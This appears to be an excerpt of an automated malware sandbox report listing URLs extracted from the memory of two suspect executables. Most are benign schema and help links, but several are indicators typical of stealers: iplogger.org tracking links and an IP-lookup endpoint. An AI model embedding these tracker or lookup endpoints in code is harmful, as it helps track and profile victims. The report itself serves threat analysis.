                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                        Source: mopnns.exe, 00000004.00000002.469278293.0000000002612000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                        Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                        Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                        Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                        Source: mopnns.exe, 00000004.00000002.469216086.00000000025F2000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                        Source: mopnns.exe, 00000004.00000002.469190974.00000000025E2000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                        Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                        Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                        Source: mopnns.exe, 00000004.00000002.469190974.00000000025E2000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                        Source: mopnns.exe, 00000004.00000002.469278293.0000000002612000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                        Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: mopnns.exe, 00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.476408687.0000000004F40000.00000004.00020000.sdmp, mopnns.exe, 00000004.00000002.475297379.00000000049D0000.00000004.00020000.sdmp, mopnns.exe, 00000004.00000003.402292014.000000000074A000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                        Source: VYeSXonMT1.exe, VYeSXonMT1.exe, 00000000.00000002.406063064.0000000003990000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405371643.0000000000400000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000003.374805242.0000000003A60000.00000004.00000001.sdmpString found in binary or memory: https://autohotkey.com
                        Source: VYeSXonMT1.exe, 00000000.00000002.406063064.0000000003990000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405371643.0000000000400000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000003.374805242.0000000003A60000.00000004.00000001.sdmpString found in binary or memory: https://autohotkey.comCould
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                        Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405960317.000000000209C000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/
                        Source: VYeSXonMT1.exe, 00000000.00000002.406204176.0000000003A60000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1mhvg7
                        Source: VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1mhvg7e
                        Source: VYeSXonMT1.exe, 00000000.00000002.406204176.0000000003A60000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405979287.00000000020B5000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1mjvg7
                        Source: VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/?Oq
                        Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/S
                        Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/a
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
